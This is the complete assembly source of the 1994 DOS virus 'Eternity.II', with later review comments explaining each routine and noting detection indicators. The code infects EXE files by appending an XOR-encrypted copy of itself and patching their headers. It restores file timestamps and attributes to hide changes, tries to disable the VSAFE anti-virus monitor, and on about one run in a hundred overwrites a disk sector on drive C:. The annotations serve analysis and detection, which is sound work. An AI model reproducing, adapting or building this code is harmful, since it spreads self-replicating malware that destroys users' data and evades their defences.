; -Eternity.II-
; "Created by Immortal Riot's destructive development team"
; (c) '94 The Unforgiven/Immortal Riot
;
; "If this virus survive into eternity, I'll live forever"
; or
; "Nothing last forever"
;
; Notes:
; F-Prot, Scan, TBAV, Findviru, can't find shits of this virus.
;
; Disclaimer:
; If this virus harms your computer and you kill yourself,
; I'll not attend on nor pay for your funeral.
;
; Dedication:
; I dedicate this virus to all members of Dia Psalma for all
; the ideological inspiration I've gained from listening on
; their music as well as talking with them.

; Assembler setup. ".radix 16" makes every unsuffixed numeric literal in this
; file hexadecimal: "int 21" is INT 21h, "org 100" is offset 100h, and
; "mov cx,200" loads 200h (512 decimal). Read all offsets below accordingly.
.model tiny
.radix 16
.code

; Byte count between Virus_Start and Virus_End. write_virus passes this value
; to the DOS write call, so it is the amount appended to each infected file.
Virus_Lenght EQU Virus_End-Virus_Start
org 100

; Entry point of the appended code. Sets bp to the run-time address of
; Virus_Start (the "delta offset"), decrypts the body in place and jumps to it.
; Detection note: encrypt_decrypt only XORs from encryption_start onward, so
; the bytes from here up to that label are written unencrypted in every copy,
; and only the encryption_value word differs between copies.
Virus_Start:
        xchg ax, ax ; A nop to fill out the virus
        mov ax,0fa01h ; to be exactly 600 bytes!
        mov dx,5945h
        ; NOTE(review): INT 16h with AX=FA01h/DX=5945h is not a standard BIOS
        ; keyboard service; it appears to match the call that interrupt
        ; references list for unloading the VSAFE/VWATCH resident anti-virus
        ; monitor -- confirm against an interrupt list.
        int 16h

        call Get_delta ; Get the delta-offset!
Get_delta:
        pop bp                          ; bp = return address pushed by the call = run-time address of Get_delta
        sub bp,Get_Delta-Virus_Start    ; bp = run-time address of Virus_Start

        call encrypt_decrypt ; Decrypt the virus
        jmp short encryption_start ; then continue..

; write_virus: append one encrypted copy of the code to the open file.
; In:  bx = file handle (Read_File moves it there after the open call),
;      bp = run-time address of Virus_Start.
; The body is XORed in memory, written with INT 21h/AH=40h (cx = Virus_Lenght
; bytes starting at ds:dx = bp), then XORed a second time so the running copy
; is executable again. The result of the write call is not checked here.
write_virus:
        call encrypt_decrypt ; Encrypt the virus
        mov ah,40
        mov cx,Virus_Lenght
        mov dx,bp
        int 21
        call encrypt_decrypt ; Decrypt it again
        ret

; 16-bit XOR key. Assembled as 0, so XORing the first-generation copy changes
; nothing; the Random block stores a time-derived value here before each write.
; This word lies before encryption_start, so it is stored unencrypted in
; every copy.
encryption_value dw 0

; encrypt_decrypt: XOR the region encryption_start..end_of_virus with the key
; word. XOR is its own inverse, so the same routine encrypts and decrypts.
; In:       bp = run-time address of Virus_Start
; Clobbers: si, cx, dx, flags
encrypt_decrypt:
        lea si,cs:[bp+encryption_start-virus_start]             ; si -> first byte of the XORed region
        mov cx,(end_of_virus-encryption_start+1)/2              ; number of words, rounded up
        mov dx,word ptr cs:[bp+encryption_value-virus_start]    ; dx = key

Xor_LoopY:
        xor word ptr cs:[si],dx
        inc si
        inc si
        loop Xor_LoopY
        ret

; First instruction of the XORed body. Builds the host program's far return
; address on the stack from the saved header fields at Exe_header+14h
; (initial IP) and Exe_header+16h (initial CS, relative to the load segment).
; This happens before Read_File reuses the Exe_header buffer for another
; file's header, which is why the values are pushed this early.
encryption_start: ; Heuristic, beat this!
        mov ax,es       ; NOTE(review): assumes es still holds the PSP segment DOS sets at program start -- confirm
        add ax,10       ; 10h paragraphs = 100h bytes, the size of the PSP
        add ax,cs:[bp+Exe_header-Virus_Start+16]
        push ax         ; segment consumed by the retf at quit
        push cs:[bp+Exe_header-Virus_Start+14]  ; offset consumed by the retf at quit

        push ds         ; saved here, restored by "pop ds" at quit
        push cs
        pop ds          ; ds = cs, so ds-relative accesses reach the data in this code

        mov ah,1a ; Set the DTA
        lea dx,[bp+Own_dta-virus_start]
        int 21

; Payload trigger. INT 21h/AH=2Ch returns the system time with hundredths of a
; second in dl; the payload below is reached only when that value is 0, i.e.
; on roughly one run in a hundred (the author's "1%").
One_Percent:
        mov ah,2ch ; 1%
        int 21h
        cmp dl,0
        jne get_drive

; Destructive payload. INT 26h is the DOS absolute disk write: al = drive
; number (2 is C: in this call's numbering), cx = sector count (1), dx =
; starting logical sector, bx = offset of the data buffer (here loaded with
; the assembled offset of v_name).
; NOTE(review): dx comes from cwd, i.e. the sign extension of ax, and is
; presumably 0 here (first logical sector of the drive) -- this depends on
; what ax holds after the time call; confirm.
; Defensive relevance: a write through this interface bypasses the file
; system, so the damage does not show up as a modified file; sector-level
; backups are the relevant recovery control.
Cruel: ; God what I hate that
        mov al,2h ; eskimoe!
        mov cx,1
        lea bx,v_name
        cwd
        int 26h

; Skip the infection loop when the current drive is a floppy. INT 21h/AH=19h
; returns the current drive in al (0 = A:, 1 = B:, 2 = C:, ...).
Get_drive: ; Current drive
        mov ah,19h
        int 21h
        cmp al,2 ; A: or B:?
        jae get_dir             ; C: or higher: continue to the file search
        jmp restore_dir ; Yep, then don't infect
                        ; other files that run!
; Save the current directory of the default drive (INT 21h/AH=47h, dl=0) into
; the dir buffer so Restore_Dir can change back after the search has walked
; up the directory tree.
Get_Dir:
        mov ah,47
        xor dl,dl
        lea si,[bp+dir-virus_start]
        int 21

Di_Counter:
        xor di,di ; Infection counter=0
                        ; will be inc after each infection!

; ah selects the DOS search call used by Loop_Files: 4Eh (find first) on entry
; and after each directory change, 4Fh (find next) when coming from Sick_or_EXE.
_4EH:
        mov ah,4e ; Bummer..

; Search the current directory for the file_match pattern ("*.EXE"). DOS puts
; the result in the DTA set earlier (Own_dta); carry clear means a match.
Loop_Files:
        lea dx,[bp+file_match-virus_start]
        int 21

        jnc clear_attribs ; We did find a file!
                        ; Happy Happy, joy joy!
; No (further) match in this directory: change to the parent ("..") with
; INT 21h/AH=3Bh and search again. A failed change (carry set, presumably
; because the root has been reached) ends the search.
Dot_Dott:
        lea dx,[bp+dot_dot-virus_start] ; Ah, the same old
        mov ah,3bh ; dot-dot-routine again!
        int 21h

        jnc not_root ; No error!
        jmp no_victim_found ; No more files in ..

not_root:
        mov ah,4e ; Find first file
        jmp short Loop_Files ; in the new directory

; Clear all attribute bits (cx = 0) of the file just found, using
; INT 21h/AX=4301h on the name at DTA+1Eh, so that a read-only file can be
; opened for writing. The original attribute byte remains in the DTA at
; offset 15h and is written back by Set_Back_Attribs.
Clear_attribs: ; Clear file-attrib
        mov ax,4301h
        xor cx,cx
        lea dx,[bp+own_dta-virus_start+1eh] ; 1eh=filename in DTA-aera
        int 21h

; Open the same file read/write (INT 21h/AX=3D02h); the handle is returned in ax.
Open_File:
        mov ax,3d02 ; Open file in read/write mode
        mov dx,Own_dta-Virus_Start+1e ; Yep, it's still 1eh in DTA!
        add dx,bp ; bummer!
        int 21

        jnc read_File ; No error, then read the file!
        jmp cant_open_file ; Hrm?!

; Name string placed between two code paths; it is never executed because the
; jmp above always transfers away. Its assembled offset is what Cruel loads
; into bx. It lies inside the region XORed by encrypt_decrypt, so stored
; copies hold it XORed with the key word.
v_name db "Eternity_II" ; Virus name!


; Read the first 1Ch (28) bytes of the opened file into the Exe_header buffer
; with INT 21h/AH=3Fh. From here on bx holds the file handle.
Read_File:
        xchg ax,bx ;File handle in bx

        mov ah,3f ;Read file - 28 bytes
        mov cx,1c ;to EXE_header (1ch)
        lea dx,[bp+exe_header-virus_start]
        int 21

        jnc no_error ; It worked (duh)
        jmp read_error ; Hrm?!

; Decide whether to infect. Files whose first byte is not 'M' (the start of
; the "MZ" EXE signature) are skipped, and so are files that already carry
; the marker word 'RI' at header offset 12h (the EXE checksum field).
; Detection note: the same marker is stored into every header this code
; rewrites (see the write to Exe_header+12h further down), so it is a usable
; indicator of infected files.
; NOTE(review): the on-disk byte order of the two-character constant depends
; on the assembler -- presumably the bytes read "IR"; confirm on a sample.
no_error:
        cmp byte ptr ds:[bp+Exe_header-Virus_Start],'M'
        jnz no_exe
        cmp word ptr ds:[bp+Exe_header-Virus_Start+12],'RI'
        jz infected

        mov al,2 ; File pointer
        call F_Ptr ; to end of file

        push dx         ; dx:ax = original file length, kept on the stack for
        push ax         ; the entry-point calculation after the copy is appended

; Choose the XOR key for this copy from the system time (INT 21h/AH=2Ch):
; dh = seconds, dl = hundredths + seconds, retried until dl is non-zero.
; The key is therefore a clock-derived 16-bit value, and it is stored
; unencrypted in encryption_value inside the written copy.
Random:
        mov ah,2ch ; Yah. Nearly polymorfic?
        int 21h ; Oh well :-).
        add dl,dh
        jz random
        mov word ptr cs:[bp+encryption_value-virus_start],dx

        call write_virus ; Write encrypted copy

; Recompute the EXE size fields from the new file length (dx:ax after seeking
; to the end): the remainder of length/200h goes to header+2 (bytes in the
; last page) and quotient+1 to header+4 (page count).
        mov al,2 ; File pointer to end of file
        Call F_Ptr

        mov cx,200 ; bummer..
        div cx
        inc ax
        mov word ptr ds:[Exe_header-Virus_Start+2+bp],dx
        mov word ptr ds:[Exe_header-Virus_Start+4+bp],ax

; Recover the original file length pushed in no_error and derive the new
; entry point from it: length/10h gives paragraphs (ax) and a byte remainder
; (dx). Subtracting the header size in paragraphs (header+8) gives the value
; stored as initial CS (header+16h); the remainder is stored as initial IP
; (header+14h). The word at header+12h receives the 'RI' infection marker.
        pop ax
        pop dx

        mov cx,10
        div cx
        sub ax,word ptr ds:[Exe_header-Virus_Start+8+bp]
        mov word ptr ds:[Exe_header-Virus_Start+16+bp],ax
        mov word ptr ds:[Exe_header-Virus_Start+14+bp],dx
        mov word ptr ds:[Exe_header-Virus_Start+12+bp],'RI'

; Seek back to offset 0 and overwrite the first 1Ch bytes of the file with
; the patched header.
        mov al,0 ; File pointer to top of file
        call F_Ptr

        mov ah,40 ; Write header
        mov cx,1c
        lea dx,[bp+exe_header-virus_start]
        int 21

        jc write_error ; Hrm!?

; Reached after a successful header write (fall-through) and for files whose
; first byte is not 'M'; both continue with the timestamp restore.
no_exe:
        jmp short Restore_Time_Date

; Already-marked file: the decrement cancels the "inc di" in Sick_or_EXE, so
; such files do not count toward the limit of three.
infected: ; Decrease infection counter
        dec di ; with one

; Put back the file's original time (DTA+16h -> cx) and date (DTA+18h -> dx)
; with INT 21h/AX=5701h.
; Detection note: because the last-write time and (below) the attributes are
; restored, neither is a reliable indicator for this infector; the file
; length and the header fields rewritten above still change.
Restore_Time_Date: ; Nearly stealth?
        lea si,[bp+own_dta-virus_start+16h] ; Oh well :-).
        mov cx,word ptr [si]
        mov dx,word ptr [si+2]
        mov ax,5701h
        int 21h

Close_File: ; Close the file
        mov ah,3e
        int 21

; Re-apply the original attribute byte that the search left in the DTA at
; offset 15h (INT 21h/AX=4301h, name at DTA+1Eh).
Set_Back_Attribs: ; Stealth-bomber!
        mov ax,4301h
        xor ch,ch
        lea bx,[bp+own_dta-virus_start+15h]
        mov cl,[bx]
        lea dx,[bp+own_dta-virus_start+1eh]
        int 21h

; Count this file and stop once di reaches 3; otherwise continue in
; Loop_Files with ah = 4Fh (find next).
Sick_or_EXE:
        mov ah,4f ; 4fh=find next file
        inc di
        cmp di,3 ; Infected three files?
        jae finnished_infection ; Yep!
        jmp Loop_Files ; Nah!

; F_Ptr: move the file pointer with a zero offset (INT 21h/AH=42h).
; In:  al = origin (callers pass 0 = start of file, 2 = end of file),
;      bx = file handle
; Out: dx:ax = new position as returned by DOS; after al=2 the callers use it
;      as the file length.
; cx is zeroed explicitly; dx comes from cwd, the sign extension of ax, which
; is 0 here because ah = 42h leaves the sign bit of ax clear.
F_Ptr: ; Since we're using
        mov ah,42 ; this routine
        xor cx,cx ; three times,
        cwd ; calling this
        int 21 ; will save us
        ret ; some bytes

; Every failure path and the normal end of the infection loop share this
; address; no error is reported and all of them fall into Restore_Dir.
write_error: ; For no use in this virus,
read_error: ; but if something screws
cant_open_file: ; up, add 09/i21h functions,
no_victim_found: ; and test what didn't work.
finnished_infection: ;

; Change back (INT 21h/AH=3Bh) to the directory that Get_Dir saved in dir.
Restore_Dir: ; More stealth..
        lea dx,[bp+dir-virus_start]
        mov ah,3bh
        int 21

; Restore the ds pushed at encryption_start, then far-return to the
; segment:offset pushed there, i.e. the host program's original entry point.
quit: ; Return to original program
        pop ds
        retf

; Data area. Everything from here to end_of_virus lies inside the region that
; encrypt_decrypt XORs, so these strings are stored XORed with the key word.
groupdb db "(c) '94 The Unforgiven/Immortal Riot" ; That's moi..

dot_dot db '..',0 ; Another directory
file_match db '*.EXE',0 ; Infect 'em all!

; 1Ch-byte EXE header buffer (16h + 2 + 4 bytes; counts are hexadecimal under
; .radix 16). The assembled contents only matter for the first-generation
; copy: the word at offset 16h (0FFF0h) is what encryption_start adds to
; es+10h when it builds the far return address.
; NOTE(review): es+10h+0FFF0h wraps around to es and the word at offset 14h is
; 0, so the first-generation return presumably lands at PSP:0000 -- confirm.
Exe_header db 16 DUP(0)
dw 0fff0
db 4 DUP(0)
Own_Dta db 02bh DUP(0)          ; 2Bh-byte DTA that receives the find-first/find-next results
dir db 65 dup (?) ; Really really stupid!

Virus_End EQU $
end_of_virus:
end Virus_Start